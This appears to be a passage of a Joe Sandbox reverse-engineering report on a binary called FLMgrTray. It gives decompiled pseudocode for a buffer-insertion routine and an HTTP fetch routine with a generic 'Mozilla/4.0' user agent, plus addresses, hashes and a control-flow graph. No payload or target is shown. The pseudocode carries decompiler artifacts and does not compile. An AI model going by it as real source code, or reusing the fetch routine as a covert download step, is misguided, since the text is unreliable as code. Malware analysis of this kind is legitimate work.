                                                                                        				void* _t82;
                                                                                        				void** _t85;
                                                                                        				int _t95;
                                                                                        				void* _t99;
                                                                                        				unsigned int _t101;
                                                                                        				void* _t103;
                                                                                        				void* _t105;
                                                                                        				void* _t106;
                                                                                        				void* _t110;
                                                                                        				void* _t111;
                                                                                        				signed int _t112;
                                                                                        				void* _t113;
                                                                                        				int _t117;
                                                                                        				void* _t121;
                                                                                        				void* _t122;
                                                                                        				void* _t123;
                                                                                        				void* _t127;
                                                                                        				void* _t135;
                                                                                        				void* _t136;
                                                                                        				void* _t141;
                                                                                        
                                                                                        				_t121 = __esi;
                                                                                        				_t136 = _t135 - 0xc;
                                                                                        				_t43 = _a4;
                                                                                        				_t85 = __ecx;
                                                                                        				_t117 = _a12 - _a8;
                                                                                        				_v12 = _t43 -  *((intOrPtr*)(__ecx));
                                                                                        				if(_t117 != 1 || _t43 !=  *((intOrPtr*)(__ecx + 4))) {
                                                                                        					_a15 = 0;
                                                                                        					if(_t117 == 0) {
                                                                                        						goto L28;
                                                                                        					} else {
                                                                                        						goto L4;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_a15 = 1;
                                                                                        					L4:
                                                                                        					_t111 = _t85[2];
                                                                                        					_push(_t121);
                                                                                        					_t122 = _t85[1];
                                                                                        					if(_t117 <= _t111 - _t122) {
                                                                                        						L25:
                                                                                        						_t95 = _t122 - _t43;
                                                                                        						_a12 = _t95;
                                                                                        						if(_t117 >= _t95) {
                                                                                        							_t123 = _t43 + _t117;
                                                                                        							memmove(_t123, _t43, _t95);
                                                                                        							_t85[1] = _t123 + _a12;
                                                                                        							_t43 = memmove(_a4, _a8, _t117);
                                                                                        							L28:
                                                                                        							return _t43;
                                                                                        						} else {
                                                                                        							memmove(_t122, _t122 - _t117, _t117);
                                                                                        							_t85[1] = _t122 + _t117;
                                                                                        							memmove(_t122 - _t122 - _t117 - _a4, _a4, _t122 - _t117 - _a4);
                                                                                        							return memmove(_a4, _a8, _t117);
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t99 =  *_t85;
                                                                                        						_t127 = _t122 - _t99;
                                                                                        						if(_t117 > 0x7fffffff - _t127) {
                                                                                        							E00164D00(_t99);
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							 *_t99 = 0x190080;
                                                                                        							 *((intOrPtr*)(_t99 + 4)) = 0;
                                                                                        							return _t99;
                                                                                        						} else {
                                                                                        							_t112 = _t111 - _t99;
                                                                                        							_t122 = _t127 + _t117;
                                                                                        							_t101 = _t112 >> 1;
                                                                                        							_v16 = _t122;
                                                                                        							if(_t112 <= 0x7fffffff - _t101) {
                                                                                        								_t103 =  <  ? _t122 : _t101 + _t112;
                                                                                        								_v8 = _t103;
                                                                                        							} else {
                                                                                        								_t103 = _t122;
                                                                                        								_v8 = _t122;
                                                                                        							}
                                                                                        							if(_t103 < 0x1000) {
                                                                                        								if(_t103 == 0) {
                                                                                        									_t122 = 0;
                                                                                        								} else {
                                                                                        									_push(_t103);
                                                                                        									_t81 = E00175703();
                                                                                        									_t136 = _t136 + 4;
                                                                                        									_t122 = _t81;
                                                                                        								}
                                                                                        								goto L15;
                                                                                        							} else {
                                                                                        								_t82 = _t103 + 0x23;
                                                                                        								_t83 =  <=  ? _t112 | 0xffffffff : _t82;
                                                                                        								_push( <=  ? _t112 | 0xffffffff : _t82); // executed
                                                                                        								_t43 = E00175703(); // executed
                                                                                        								_t136 = _t136 + 4;
                                                                                        								if(_t43 == 0) {
                                                                                        									L24:
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									goto L25;
                                                                                        								} else {
                                                                                        									_t14 = _t43 + 0x23; // 0x23
                                                                                        									_t122 = _t14 & 0xffffffe0;
                                                                                        									 *(_t122 - 4) = _t43;
                                                                                        									L15:
                                                                                        									_t105 = _v12 + _t122;
                                                                                        									_v12 = _t105;
                                                                                        									memmove(_t105, _a8, _t117);
                                                                                        									_t106 =  *_t85;
                                                                                        									_t141 = _t136 + 0xc;
                                                                                        									if(_a15 == 0) {
                                                                                        										memmove(_t122, _t106, _a4 - _t106);
                                                                                        										memmove(_v12 + _t117, _a4, _t85[1] - _a4);
                                                                                        										_t136 = _t141 + 0x18;
                                                                                        									} else {
                                                                                        										memmove(_t122, _t106, _t85[1] - _t106);
                                                                                        										_t136 = _t141 + 0xc;
                                                                                        									}
                                                                                        									_t71 =  *_t85;
                                                                                        									if(_t71 == 0) {
                                                                                        										L23:
                                                                                        										 *_t85 = _t122;
                                                                                        										_t85[1] = _v16 + _t122;
                                                                                        										_t75 = _v8 + _t122;
                                                                                        										_t85[2] = _t75;
                                                                                        										return _t75;
                                                                                        									} else {
                                                                                        										_t110 = _t85[2] - _t71;
                                                                                        										if(_t110 < 0x1000) {
                                                                                        											L22:
                                                                                        											_push(_t110);
                                                                                        											E00175733(_t71, _t71); // executed
                                                                                        											goto L23;
                                                                                        										} else {
                                                                                        											_t113 =  *(_t71 - 4);
                                                                                        											_t110 = _t110 + 0x23;
                                                                                        											_t43 = _t71 - _t113 + 0xfffffffc;
                                                                                        											if(_t43 > 0x1f) {
                                                                                        												goto L24;
                                                                                        											} else {
                                                                                        												_t71 = _t113;
                                                                                        												goto L22;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        			}






























                                                                                        0x00164940
                                                                                        0x00164943
                                                                                        0x00164946
                                                                                        0x0016494a
                                                                                        0x00164952
                                                                                        0x00164957
                                                                                        0x0016495d
                                                                                        0x0016496a
                                                                                        0x00164970
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00164964
                                                                                        0x00164964
                                                                                        0x00164976
                                                                                        0x00164976
                                                                                        0x0016497b
                                                                                        0x0016497c
                                                                                        0x00164983
                                                                                        0x00164aaa
                                                                                        0x00164aac
                                                                                        0x00164aae
                                                                                        0x00164ab3
                                                                                        0x00164af4
                                                                                        0x00164af9
                                                                                        0x00164b03
                                                                                        0x00164b0e
                                                                                        0x00164b17
                                                                                        0x00164b1c
                                                                                        0x00164ab5
                                                                                        0x00164abc
                                                                                        0x00164ac6
                                                                                        0x00164ad5
                                                                                        0x00164af0
                                                                                        0x00164af0
                                                                                        0x00164989
                                                                                        0x00164989
                                                                                        0x00164990
                                                                                        0x00164996
                                                                                        0x00164b1f
                                                                                        0x00164b24
                                                                                        0x00164b25
                                                                                        0x00164b26
                                                                                        0x00164b27
                                                                                        0x00164b28
                                                                                        0x00164b29
                                                                                        0x00164b2a
                                                                                        0x00164b2b
                                                                                        0x00164b2c
                                                                                        0x00164b2d
                                                                                        0x00164b2e
                                                                                        0x00164b2f
                                                                                        0x00164b30
                                                                                        0x00164b38
                                                                                        0x00164b3f
                                                                                        0x0016499c
                                                                                        0x0016499c
                                                                                        0x001649a5
                                                                                        0x001649a7
                                                                                        0x001649ab
                                                                                        0x001649b0
                                                                                        0x001649bd
                                                                                        0x001649c0
                                                                                        0x001649b2
                                                                                        0x001649b2
                                                                                        0x001649b4
                                                                                        0x001649b4
                                                                                        0x001649c9
                                                                                        0x001649f4
                                                                                        0x00164a03
                                                                                        0x001649f6
                                                                                        0x001649f6
                                                                                        0x001649f7
                                                                                        0x001649fc
                                                                                        0x001649ff
                                                                                        0x001649ff
                                                                                        0x00000000
                                                                                        0x001649cb
                                                                                        0x001649cb
                                                                                        0x001649d3
                                                                                        0x001649d6
                                                                                        0x001649d7
                                                                                        0x001649dc
                                                                                        0x001649e1
                                                                                        0x00164aa4
                                                                                        0x00164aa4
                                                                                        0x00000000
                                                                                        0x001649e7
                                                                                        0x001649e7
                                                                                        0x001649ea
                                                                                        0x001649ed
                                                                                        0x00164a05
                                                                                        0x00164a0b
                                                                                        0x00164a10
                                                                                        0x00164a13
                                                                                        0x00164a18
                                                                                        0x00164a1a
                                                                                        0x00164a21
                                                                                        0x00164a3d
                                                                                        0x00164a52
                                                                                        0x00164a57
                                                                                        0x00164a23
                                                                                        0x00164a2b
                                                                                        0x00164a30
                                                                                        0x00164a30
                                                                                        0x00164a5a
                                                                                        0x00164a5e
                                                                                        0x00164a89
                                                                                        0x00164a8e
                                                                                        0x00164a90
                                                                                        0x00164a96
                                                                                        0x00164a9a
                                                                                        0x00164aa1
                                                                                        0x00164a60
                                                                                        0x00164a63
                                                                                        0x00164a6b
                                                                                        0x00164a7f
                                                                                        0x00164a7f
                                                                                        0x00164a81
                                                                                        0x00000000
                                                                                        0x00164a6d
                                                                                        0x00164a6d
                                                                                        0x00164a70
                                                                                        0x00164a75
                                                                                        0x00164a7b
                                                                                        0x00000000
                                                                                        0x00164a7d
                                                                                        0x00164a7d
                                                                                        0x00000000
                                                                                        0x00164a7d
                                                                                        0x00164a7b
                                                                                        0x00164a6b
                                                                                        0x00164a5e
                                                                                        0x001649e1
                                                                                        0x001649c9
                                                                                        0x00164996
                                                                                        0x00164983

                                                                                        APIs
                                                                                        • memmove.VCRUNTIME140(?,?,?), ref: 00164A13
                                                                                        • memmove.VCRUNTIME140(00000000,?,?), ref: 00164A2B
                                                                                        • memmove.VCRUNTIME140(00000000,?,?), ref: 00164A3D
                                                                                        • memmove.VCRUNTIME140(?,?,?,00000000,?,?), ref: 00164A52
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00164AA4
                                                                                        • memmove.VCRUNTIME140(?,?,?), ref: 00164ABC
                                                                                        • memmove.VCRUNTIME140(?,?,?,?,?,?), ref: 00164AD5
                                                                                        • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?), ref: 00164AE2
                                                                                        • memmove.VCRUNTIME140(?,?,?), ref: 00164AF9
                                                                                        • memmove.VCRUNTIME140(?,?,?,?,?,?), ref: 00164B0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2580228974-0
                                                                                        • Opcode ID: 414ca483bba4a39bcb5f1befc4ed3aef804c6909f87170dc37f0d5939e7ddd36
                                                                                        • Instruction ID: 92fc12ef442ac228d4a92664fd08ad6e805e8463e464c505f47095d4241c9e36
                                                                                        • Opcode Fuzzy Hash: 414ca483bba4a39bcb5f1befc4ed3aef804c6909f87170dc37f0d5939e7ddd36
                                                                                        • Instruction Fuzzy Hash: 1251A172A10014AFDB18DF7CCD85AAE7BA9DB85310B058269F809CB245E770DE64C7A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1394 183d80-183df0 call 183540 call 185d80 1399 184015-184026 call 183690 1394->1399 1400 183df6-183e27 call 186400 call 186500 1394->1400 1405 184028-184034 1399->1405 1406 184056-184077 call 1755f4 1399->1406 1415 18400a-184010 call 185d50 1400->1415 1416 183e2d-183e74 memset call 186ef0 1400->1416 1408 18404c-184053 call 175733 1405->1408 1409 184036-184044 1405->1409 1408->1406 1409->1408 1412 184046 _invalid_parameter_noinfo_noreturn 1409->1412 1412->1408 1415->1399 1416->1415 1421 183e7a 1416->1421 1422 183e80-183e88 1421->1422 1423 183e8e-183ea0 1422->1423 1424 184003 1422->1424 1425 183ecd-183ed6 1423->1425 1426 183ea2-183ead 1423->1426 1424->1415 1429 184078-18407f call 1631f0 1425->1429 1430 183edc-183ee8 1425->1430 1427 183eaf 1426->1427 1428 183eb1-183ec8 memmove 1426->1428 1427->1428 1431 183fdb-183ff4 call 186ef0 1428->1431 1432 183eea-183eef 1430->1432 1433 183ef1-183f08 1430->1433 1440 183ff9-183ffb 1431->1440 1436 183f1e-183f4e call 163200 1432->1436 1437 183f0a-183f0f 1433->1437 1438 183f11-183f1b 1433->1438 1444 183f50-183f8d memcpy * 2 1436->1444 1445 183fb1-183fcf memcpy * 2 1436->1445 1437->1436 1438->1436 1440->1422 1442 184001 1440->1442 1442->1415 1447 183f8f-183f9d 1444->1447 1448 183fa5-183fa7 call 175733 1444->1448 1446 183fd3-183fd9 1445->1446 1446->1431 1447->1412 1449 183fa3 1447->1449 1451 183fac-183faf 1448->1451 1449->1448 1451->1446
                                                                                        C-Code - Quality: 58%
                                                                                        			E00183D80(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4, int _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a44) {
                                                                                        				void* _v0;
                                                                                        				int _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				void _v1044;
                                                                                        				void _v1048;
                                                                                        				void* _v1072;
                                                                                        				intOrPtr _v1076;
                                                                                        				char _v1092;
                                                                                        				char _v1096;
                                                                                        				void* _v1152;
                                                                                        				char _v1180;
                                                                                        				char _v1181;
                                                                                        				char _v1184;
                                                                                        				void _v1188;
                                                                                        				void _v1192;
                                                                                        				int _v1196;
                                                                                        				unsigned int _v1200;
                                                                                        				void* _v1212;
                                                                                        				char _v1220;
                                                                                        				signed int _v1224;
                                                                                        				char _v2384;
                                                                                        				void* _v2412;
                                                                                        				void* __ebp;
                                                                                        				signed int _t140;
                                                                                        				signed int _t141;
                                                                                        				void* _t146;
                                                                                        				void* _t156;
                                                                                        				void* _t162;
                                                                                        				signed int _t169;
                                                                                        				signed int _t170;
                                                                                        				void* _t175;
                                                                                        				intOrPtr _t179;
                                                                                        				void* _t187;
                                                                                        				void* _t193;
                                                                                        				void** _t199;
                                                                                        				void* _t205;
                                                                                        				void* _t207;
                                                                                        				void* _t216;
                                                                                        				void _t221;
                                                                                        				void _t225;
                                                                                        				void* _t233;
                                                                                        				void* _t235;
                                                                                        				void* _t244;
                                                                                        				void _t249;
                                                                                        				void _t253;
                                                                                        				void* _t257;
                                                                                        				void* _t259;
                                                                                        				intOrPtr _t268;
                                                                                        				intOrPtr _t280;
                                                                                        				void* _t281;
                                                                                        				void* _t287;
                                                                                        				signed int _t290;
                                                                                        				void* _t291;
                                                                                        				void* _t293;
                                                                                        				void* _t296;
                                                                                        				signed int _t298;
                                                                                        				void* _t299;
                                                                                        				void* _t301;
                                                                                        				void* _t304;
                                                                                        				char _t305;
                                                                                        				void _t306;
                                                                                        				unsigned int _t307;
                                                                                        				intOrPtr _t308;
                                                                                        				intOrPtr _t309;
                                                                                        				void* _t310;
                                                                                        				intOrPtr _t311;
                                                                                        				unsigned int _t312;
                                                                                        				int _t317;
                                                                                        				int _t319;
                                                                                        				intOrPtr _t322;
                                                                                        				void* _t323;
                                                                                        				intOrPtr _t325;
                                                                                        				void* _t326;
                                                                                        				void* _t327;
                                                                                        				void* _t328;
                                                                                        				void* _t329;
                                                                                        				void* _t330;
                                                                                        				signed int _t331;
                                                                                        				signed int _t332;
                                                                                        				void* _t334;
                                                                                        				signed int _t335;
                                                                                        				void* _t337;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E643);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t335 = _t334 - 0x4a0;
                                                                                        				_t140 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t141 = _t140 ^ _t331;
                                                                                        				_v20 = _t141;
                                                                                        				_push(_t141);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t257 = _a28;
                                                                                        				_v8 = 0;
                                                                                        				_v1181 = 0;
                                                                                        				E00183540( &_v1180);
                                                                                        				_t145 =  >=  ? _a4 :  &_a4;
                                                                                        				_v8 = 1;
                                                                                        				_t146 = E00185D80( &_v1180, _a24 - 0x10,  >=  ? _a4 :  &_a4, 0, 0, "Mozilla/4.0 (compatible; )"); // executed
                                                                                        				if(_t146 == 0) {
                                                                                        					L26:
                                                                                        					E00183690( &_v1180);
                                                                                        					_t305 = _a24;
                                                                                        					if(_t305 >= 0x10) {
                                                                                        						_t268 = _a4;
                                                                                        						_t306 = _t305 + 1;
                                                                                        						_t150 = _t268;
                                                                                        						if(_t306 >= 0x1000) {
                                                                                        							_t268 =  *((intOrPtr*)(_t268 - 4));
                                                                                        							_t306 = _t306 + 0x23;
                                                                                        							if(_t150 > 0x1f) {
                                                                                        								goto L29;
                                                                                        							}
                                                                                        						}
                                                                                        						goto L30;
                                                                                        					}
                                                                                        					goto L31;
                                                                                        				} else {
                                                                                        					E00186400( &_v1180);
                                                                                        					_t155 =  >=  ? _v1092 :  &_v1092;
                                                                                        					_t156 = E00186500( &_v1180,  >=  ? _v1092 :  &_v1092, 0, 0); // executed
                                                                                        					if(_t156 == 0) {
                                                                                        						L25:
                                                                                        						E00185D50( &_v1180);
                                                                                        						goto L26;
                                                                                        					} else {
                                                                                        						memset( &_v1044, 0, 0x400);
                                                                                        						_t335 = _t335 + 0xc;
                                                                                        						_v1196 = 0;
                                                                                        						_v1181 = 0;
                                                                                        						_push( &_v1196);
                                                                                        						_t162 = E00186EF0( &_v1180,  &_v1044, 0x400); // executed
                                                                                        						if(_t162 != 0) {
                                                                                        							asm("o16 nop [eax+eax]");
                                                                                        							while(1) {
                                                                                        								_t317 = _v1196;
                                                                                        								if(_t317 == 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t307 =  *(_t257 + 0x14);
                                                                                        								_t322 =  *((intOrPtr*)(_t257 + 0x10));
                                                                                        								_v1200 = _t307;
                                                                                        								if(_t317 > _t307 - _t322) {
                                                                                        									__eflags = 0x7fffffff - _t322 - _t317;
                                                                                        									if(0x7fffffff - _t322 < _t317) {
                                                                                        										E001631F0(_t307);
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										_push(_t331);
                                                                                        										_t332 = _t335;
                                                                                        										_push(0xffffffff);
                                                                                        										_push(E0018E68B);
                                                                                        										_push( *[fs:0x0]);
                                                                                        										_t337 = _t335 - 0x49c;
                                                                                        										_t169 =  *0x19d05c; // 0x2c80d730
                                                                                        										_t170 = _t169 ^ _t332;
                                                                                        										_v1224 = _t170;
                                                                                        										_push(_t257);
                                                                                        										_push(_t322);
                                                                                        										_push(_t317);
                                                                                        										_push(_t170);
                                                                                        										 *[fs:0x0] =  &_v1220;
                                                                                        										_t259 = _v1152;
                                                                                        										_v1212 = 1;
                                                                                        										_t323 = 0;
                                                                                        										E00183540( &_v2384);
                                                                                        										__eflags = _v1180 - 0x10;
                                                                                        										_t174 =  >=  ? _v1200 :  &_v1200;
                                                                                        										_v1212 = 2;
                                                                                        										_t175 = E00185D80( &_v2384, _v1180 - 0x10,  >=  ? _v1200 :  &_v1200, 0, 0, "Mozilla/4.0 (compatible; )");
                                                                                        										__eflags = _t175;
                                                                                        										if(_t175 == 0) {
                                                                                        											L59:
                                                                                        											E00183690( &_v1184);
                                                                                        											_t308 = _a20;
                                                                                        											__eflags = _t308 - 0x10;
                                                                                        											if(_t308 >= 0x10) {
                                                                                        												_t281 = _v0;
                                                                                        												_t311 = _t308 + 1;
                                                                                        												_t182 = _t281;
                                                                                        												__eflags = _t311 - 0x1000;
                                                                                        												if(_t311 >= 0x1000) {
                                                                                        													_t281 =  *((intOrPtr*)(_t281 - 4));
                                                                                        													_t311 = _t311 + 0x23;
                                                                                        													_t182 = _t182 - _t281 + 0xfffffffc;
                                                                                        													__eflags = _t182 - 0x1f;
                                                                                        													if(_t182 > 0x1f) {
                                                                                        														goto L62;
                                                                                        													}
                                                                                        												}
                                                                                        												goto L63;
                                                                                        											}
                                                                                        											goto L64;
                                                                                        										} else {
                                                                                        											__eflags = _a44 - 0x10;
                                                                                        											_t283 =  >=  ? _a24 :  &_a24;
                                                                                        											__eflags = _v1076 - 0x10;
                                                                                        											_t186 =  >=  ? _v1096 :  &_v1096;
                                                                                        											_t187 = E00186500( &_v1184,  >=  ? _v1096 :  &_v1096, 1,  >=  ? _a24 :  &_a24);
                                                                                        											__eflags = _t187;
                                                                                        											if(_t187 == 0) {
                                                                                        												L58:
                                                                                        												E00185D50( &_v1184);
                                                                                        												goto L59;
                                                                                        											} else {
                                                                                        												memset( &_v1048, 0, 0x400);
                                                                                        												_t337 = _t337 + 0xc;
                                                                                        												_v1196 = 0;
                                                                                        												_push( &_v1196);
                                                                                        												_t193 = E00186EF0( &_v1184,  &_v1048, 0x400);
                                                                                        												__eflags = _t193;
                                                                                        												if(_t193 != 0) {
                                                                                        													asm("o16 nop [eax+eax]");
                                                                                        													while(1) {
                                                                                        														_t319 = _v1196;
                                                                                        														__eflags = _t319;
                                                                                        														if(_t319 == 0) {
                                                                                        															break;
                                                                                        														}
                                                                                        														_t312 =  *(_t259 + 0x14);
                                                                                        														_t325 =  *((intOrPtr*)(_t259 + 0x10));
                                                                                        														_v1200 = _t312;
                                                                                        														__eflags = _t319 - _t312 - _t325;
                                                                                        														if(_t319 > _t312 - _t325) {
                                                                                        															__eflags = 0x7fffffff - _t325 - _t319;
                                                                                        															if(0x7fffffff - _t325 < _t319) {
                                                                                        																E001631F0(_t312);
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																asm("int3");
                                                                                        																_push(_t332);
                                                                                        																_push(0xc);
                                                                                        																_t199 = E00175703();
                                                                                        																_t287 = _v2412;
                                                                                        																__eflags = _t287;
                                                                                        																if(_t287 != 0) {
                                                                                        																	 *_t199 = _t287;
                                                                                        																	_t199[1] = _v0;
                                                                                        																	return _t199;
                                                                                        																} else {
                                                                                        																	 *_t199 = _t199;
                                                                                        																	_t199[1] = _t199;
                                                                                        																	return _t199;
                                                                                        																}
                                                                                        															} else {
                                                                                        																_t290 = _t319 + _t325 | 0x0000000f;
                                                                                        																__eflags = _t290 - 0x7fffffff;
                                                                                        																if(_t290 <= 0x7fffffff) {
                                                                                        																	_v1188 = _t312 >> 1;
                                                                                        																	__eflags = _t312 - 0x7fffffff - _v1188;
                                                                                        																	if(_t312 <= 0x7fffffff - _v1188) {
                                                                                        																		_t205 = _v1188 + _t312;
                                                                                        																		__eflags = _t290 - _t205;
                                                                                        																		_t291 =  <  ? _t205 : _t290;
                                                                                        																	} else {
                                                                                        																		_t291 = 0x7fffffff;
                                                                                        																	}
                                                                                        																} else {
                                                                                        																	_t291 = 0x7fffffff;
                                                                                        																}
                                                                                        																_t100 = _t291 + 1; // 0x80000000
                                                                                        																_v1188 = _t291;
                                                                                        																_t207 = E00163200(_t312, _t100);
                                                                                        																__eflags = _v1200 - 0x10;
                                                                                        																_t293 = _t207;
                                                                                        																_v1192 = _t293;
                                                                                        																 *((intOrPtr*)(_t259 + 0x10)) = _t319 + _t325;
                                                                                        																 *(_t259 + 0x14) = _v1188;
                                                                                        																_push(_t325);
                                                                                        																if(_v1200 < 0x10) {
                                                                                        																	memcpy(_t293, _t259, ??);
                                                                                        																	_t326 = _t325 + _v1192;
                                                                                        																	__eflags = _t326;
                                                                                        																	memcpy(_t326,  &_v1048, _t319);
                                                                                        																	_t337 = _t337 + 0x18;
                                                                                        																	 *((char*)(_t326 + _t319)) = 0;
                                                                                        																	goto L54;
                                                                                        																} else {
                                                                                        																	_v1188 =  *_t259;
                                                                                        																	memcpy(_t293, _t217, ??);
                                                                                        																	_t323 = _t325 + _v1192;
                                                                                        																	memcpy(_t323,  &_v1048, _t319);
                                                                                        																	_t337 = _t337 + 0x18;
                                                                                        																	_t221 = _v1188;
                                                                                        																	_t296 = 1 + _v1200;
                                                                                        																	 *((char*)(_t323 + _t319)) = 0;
                                                                                        																	__eflags = _t296 - 0x1000;
                                                                                        																	if(_t296 < 0x1000) {
                                                                                        																		L52:
                                                                                        																		_push(_t296);
                                                                                        																		E00175733(_t221, _t221);
                                                                                        																		_t337 = _t337 + 8;
                                                                                        																		L54:
                                                                                        																		 *_t259 = _v1192;
                                                                                        																		goto L55;
                                                                                        																	} else {
                                                                                        																		_t311 =  *((intOrPtr*)(_t221 - 4));
                                                                                        																		_t281 = _t296 + 0x23;
                                                                                        																		_t182 = _t221 - _t311 + 0xfffffffc;
                                                                                        																		__eflags = _t221 - _t311 + 0xfffffffc - 0x1f;
                                                                                        																		if(_t221 - _t311 + 0xfffffffc > 0x1f) {
                                                                                        																			L62:
                                                                                        																			__imp___invalid_parameter_noinfo_noreturn();
                                                                                        																			L63:
                                                                                        																			_push(_t311);
                                                                                        																			E00175733(_t182, _t281);
                                                                                        																			_t337 = _t337 + 8;
                                                                                        																			L64:
                                                                                        																			_t309 = _a44;
                                                                                        																			_a16 = 0;
                                                                                        																			_a20 = 0xf;
                                                                                        																			_v0 = 0;
                                                                                        																			__eflags = _t309 - 0x10;
                                                                                        																			if(_t309 >= 0x10) {
                                                                                        																				_t280 = _a24;
                                                                                        																				_t310 = _t309 + 1;
                                                                                        																				_t179 = _t280;
                                                                                        																				__eflags = _t310 - 0x1000;
                                                                                        																				if(_t310 >= 0x1000) {
                                                                                        																					_t280 =  *((intOrPtr*)(_t280 - 4));
                                                                                        																					_t310 = _t310 + 0x23;
                                                                                        																					_t179 = _t179 - _t280 + 0xfffffffc;
                                                                                        																					__eflags = _t179 - 0x1f;
                                                                                        																					if(_t179 > 0x1f) {
                                                                                        																						__imp___invalid_parameter_noinfo_noreturn();
                                                                                        																					}
                                                                                        																				}
                                                                                        																				_push(_t310);
                                                                                        																				E00175733(_t179, _t280);
                                                                                        																			}
                                                                                        																			 *[fs:0x0] = _v20;
                                                                                        																			__eflags = _v24 ^ _t332;
                                                                                        																			return E001755F4(_v24 ^ _t332);
                                                                                        																		} else {
                                                                                        																			_t221 = _t311;
                                                                                        																			goto L52;
                                                                                        																		}
                                                                                        																	}
                                                                                        																}
                                                                                        															}
                                                                                        														} else {
                                                                                        															 *((intOrPtr*)(_t259 + 0x10)) = _t319 + _t325;
                                                                                        															_t225 = _t259;
                                                                                        															__eflags = _t312 - 0x10;
                                                                                        															if(_t312 >= 0x10) {
                                                                                        																_t225 =  *_t259;
                                                                                        															}
                                                                                        															_t327 = _t325 + _t225;
                                                                                        															memmove(_t327,  &_v1048, _t319);
                                                                                        															_t337 = _t337 + 0xc;
                                                                                        															 *((char*)(_t327 + _t319)) = 0;
                                                                                        															L55:
                                                                                        															_push( &_v1196);
                                                                                        															_t216 = E00186EF0( &_v1184,  &_v1048, 0x400);
                                                                                        															__eflags = _t216;
                                                                                        															if(_t216 != 0) {
                                                                                        																continue;
                                                                                        															} else {
                                                                                        																_t323 = 0;
                                                                                        																goto L58;
                                                                                        															}
                                                                                        														}
                                                                                        														goto L74;
                                                                                        													}
                                                                                        													_t323 = 1;
                                                                                        												}
                                                                                        												goto L58;
                                                                                        											}
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t298 = _t317 + _t322 | 0x0000000f;
                                                                                        										__eflags = _t298 - 0x7fffffff;
                                                                                        										if(_t298 <= 0x7fffffff) {
                                                                                        											_v1188 = _t307 >> 1;
                                                                                        											__eflags = _t307 - 0x7fffffff - _v1188;
                                                                                        											if(_t307 <= 0x7fffffff - _v1188) {
                                                                                        												_t233 = _v1188 + _t307;
                                                                                        												__eflags = _t298 - _t233;
                                                                                        												_t299 =  <  ? _t233 : _t298;
                                                                                        												__eflags = _t299;
                                                                                        											} else {
                                                                                        												_t299 = 0x7fffffff;
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t299 = 0x7fffffff;
                                                                                        										}
                                                                                        										_t35 = _t299 + 1; // 0x80000000
                                                                                        										_v1188 = _t299;
                                                                                        										_t235 = E00163200(_t307, _t35); // executed
                                                                                        										__eflags = _v1200 - 0x10;
                                                                                        										_t301 = _t235;
                                                                                        										_v1192 = _t301;
                                                                                        										 *((intOrPtr*)(_t257 + 0x10)) = _t317 + _t322;
                                                                                        										 *(_t257 + 0x14) = _v1188;
                                                                                        										_push(_t322);
                                                                                        										if(_v1200 < 0x10) {
                                                                                        											memcpy(_t301, _t257, ??);
                                                                                        											_t328 = _t322 + _v1192;
                                                                                        											__eflags = _t328;
                                                                                        											memcpy(_t328,  &_v1044, _t317);
                                                                                        											_t335 = _t335 + 0x18;
                                                                                        											 *((char*)(_t328 + _t317)) = 0;
                                                                                        											goto L21;
                                                                                        										} else {
                                                                                        											_v1188 =  *_t257;
                                                                                        											memcpy(_t301, _t245, ??);
                                                                                        											_t329 = _t322 + _v1192;
                                                                                        											memcpy(_t329,  &_v1044, _t317);
                                                                                        											_t335 = _t335 + 0x18;
                                                                                        											_t249 = _v1188;
                                                                                        											_t304 = 1 + _v1200;
                                                                                        											 *((char*)(_t329 + _t317)) = 0;
                                                                                        											__eflags = _t304 - 0x1000;
